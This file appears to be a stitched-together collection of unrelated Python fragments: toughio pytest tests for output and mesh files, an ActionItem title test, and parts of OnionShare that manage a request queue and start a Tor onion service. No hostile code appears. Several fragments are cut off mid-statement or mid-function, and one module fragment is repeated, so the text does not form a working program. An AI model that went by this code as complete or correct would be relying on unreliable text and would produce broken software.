@pytest.mark.parametrize(
    "write_read, fmt",
    [
        (write_read_tough, None),
        (write_read_tough, helpers.random_string(20)),
        (write_read_json, None),
        (write_read_json, helpers.random_string(20)),
    ],
)
def test_outpu(write_read, fmt):
    parameters_ref = {
        "output": {
            "format": fmt,
            "variables": {
                helpers.random_string(20): None,
                helpers.random_string(20): numpy.random.randint(10),
                helpers.random_string(20): numpy.random.randint(10, size=1),
REQUEST_LOAD = 0
REQUEST_DOWNLOAD = 1
REQUEST_PROGRESS = 2
REQUEST_OTHER = 3
REQUEST_CANCELED = 4

q = Queue.Queue()


def add_request(type, path, data=None):
    global q
    q.put({'type': type, 'path': path, 'data': data})


slug = helpers.random_string(16)
download_count = 0

stay_open = False


def set_stay_open(new_stay_open):
    global stay_open
    stay_open = new_stay_open


def get_stay_open():
    return stay_open


def debug_mode():
def start_hidden_service(self, gui=False, tails_root=False):
    if not self.port:
        self.choose_port()

    if helpers.get_platform() == 'Tails' and not tails_root:
        # in Tails, start the hidden service in a root process
        if gui:
            args = [
                '/usr/bin/gksudo', '-D', 'OnionShare', '--', '/usr/bin/onionshare'
            ]
        else:
            args = ['/usr/bin/sudo', '--', '/usr/bin/onionshare']
        p = subprocess.Popen(args + [str(self.port)],
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE)
        stdout = p.stdout.read(22)  # .onion URLs are 22 chars long

        if stdout:
            self.onion_host = stdout
        else:
            if p.poll() == -1:
                raise TailsError(p.stderr.read())
            else:
                raise TailsError(strings._("error_tails_unknown_root"))
    else:
        if self.local_only:
            self.onion_host = '127.0.0.1:{0}'.format(self.port)
        else:
            # come up with a hidden service directory name
            hidserv_dir = '{0}/onionshare_{1}'.format(
                helpers.get_tmp_dir(), helpers.random_string(8))
            self.cleanup_filenames.append(hidserv_dir)

            # connect to the tor controlport
            controller = False
            tor_control_ports = [9051, 9151]
            for tor_control_port in tor_control_ports:
                try:
                    controller = Controller.from_port(port=tor_control_port)
                    break
                except SocketError:
                    pass
            if not controller:
                raise NoTor(
                    strings._("cant_connect_ctrlport").format(tor_control_ports))
            controller.authenticate()

            # set up hidden service
            controller.set_options([
                ('HiddenServiceDir', hidserv_dir),
                ('HiddenServicePort', '80 127.0.0.1:{0}'.format(self.port))
            ])

            # figure out the .onion hostname
            hostname_file = '{0}/hostname'.format(hidserv_dir)
            self.onion_host = open(hostname_file, 'r').read().strip()
def test_title_2_with_long_description_with_default(self):
    description = random_string(1000)
    actionitem = ActionItem()
    actionitem.description = description
    assert actionitem.title() == description[:140]
def test_mesh(nodal_distance, bound, coord):
    # Create 3D mesh
    dx = numpy.arange(3) + 1
    dy = numpy.arange(4) + 1
    dz = numpy.arange(5) + 1
    mesh = toughio.meshmaker.structured_grid(
        dx, dy, dz, material=helpers.random_string(5)
    )

    idx = numpy.random.choice(mesh.n_cells, mesh.n_cells // 2, replace=False)
    mesh.cell_data["material"][idx] = 2
    mesh.field_data[helpers.random_string(5)] = numpy.array([2, 3])

    idx = numpy.random.choice(mesh.n_cells, mesh.n_cells // 2, replace=False)
    boundary_condition = (
        (numpy.random.rand(mesh.n_cells) < numpy.random.rand()).astype(int)
        if bound
        else numpy.zeros(mesh.n_cells)
    )
    mesh.add_cell_data("boundary_condition", boundary_condition)

    parameters = helpers.write_read(
        filename="MESH",
        obj=None,
        writer=mesh.write_tough,
        reader=toughio.read_mesh,
        writer_kws={"nodal_distance": nodal_distance, "coord": coord},
        reader_kws={"file_format": "tough"},
    )

    # Check block ELEME
    assert sorted(mesh.labels) == sorted(parameters["elements"].keys())

    materials = [parameters["elements"][label]["material"] for label in mesh.labels]
    assert mesh.materials.tolist() == materials

    volumes = [
        parameters["elements"][label]["volume"]
        for label, bcond in zip(mesh.labels, boundary_condition)
        if not bcond
    ]
    assert numpy.allclose(mesh.volumes[boundary_condition == 0], volumes)

    volumes = [
        parameters["elements"][label]["volume"]
        for label, bcond in zip(mesh.labels, boundary_condition)
        if bcond
    ]
    assert numpy.allclose(mesh.volumes[boundary_condition == 1] * 1.0e50, volumes)

    centers = [parameters["elements"][label]["center"] for label in mesh.labels]
    assert numpy.allclose(mesh.centers, centers)

    # Check block COORD
    assert parameters["coordinates"] == coord

    # Check block CONNE
    nx, ny, nz = len(dx), len(dy), len(dz)
    lx, ly, lz = sum(dx), sum(dy), sum(dz)

    isot_x = [
        v["permeability_direction"] == 1 for v in parameters["connections"].values()
    ]
    assert sum(isot_x) == (nx - 1) * ny * nz

    isot_y = [
        v["permeability_direction"] == 2 for v in parameters["connections"].values()
    ]
    assert sum(isot_y) == nx * (ny - 1) * nz

    isot_z = [
        v["permeability_direction"] == 3 for v in parameters["connections"].values()
    ]
    assert sum(isot_z) == nx * ny * (nz - 1)

    interface_areas = [v["interface_area"] for v in parameters["connections"].values()]
    assert (
        sum(interface_areas)
        == (nx - 1) * ly * lz + (ny - 1) * lx * lz + (nz - 1) * lx * ly
    )

    angles = [
        v["gravity_cosine_angle"] == 0.0 for v in parameters["connections"].values()
    ]
    assert sum(angles) == sum(isot_x) + sum(isot_y)

    angles = [
        v["gravity_cosine_angle"] == -1.0 for v in parameters["connections"].values()
    ]
    assert sum(angles) == sum(isot_z)

    if not bound:
        xmin, ymin, zmin = mesh.centers.min(axis=0)
        xmax, ymax, zmax = mesh.centers.max(axis=0)
        distances_ref = (
            ny * nz * (xmax - xmin) + nx * nz * (ymax - ymin) + nx * ny * (zmax - zmin)
        )
        distances = [v["nodal_distances"] for v in parameters["connections"].values()]
        assert numpy.allclose(distances_ref, numpy.sum(distances))
REQUEST_LOAD = 0
REQUEST_DOWNLOAD = 1
REQUEST_PROGRESS = 2
REQUEST_OTHER = 3

q = Queue.Queue()


def add_request(type, path, data=None):
    global q
    q.put({'type': type, 'path': path, 'data': data})


slug = helpers.random_string(16)
download_count = 0

stay_open = False


def set_stay_open(new_stay_open):
    global stay_open
    stay_open = new_stay_open


def get_stay_open():
    return stay_open


def debug_mode():
    import logging

    if platform.system() == 'Windows':
        temp_dir = os.environ['Temp'].replace('\\', '/')
    else: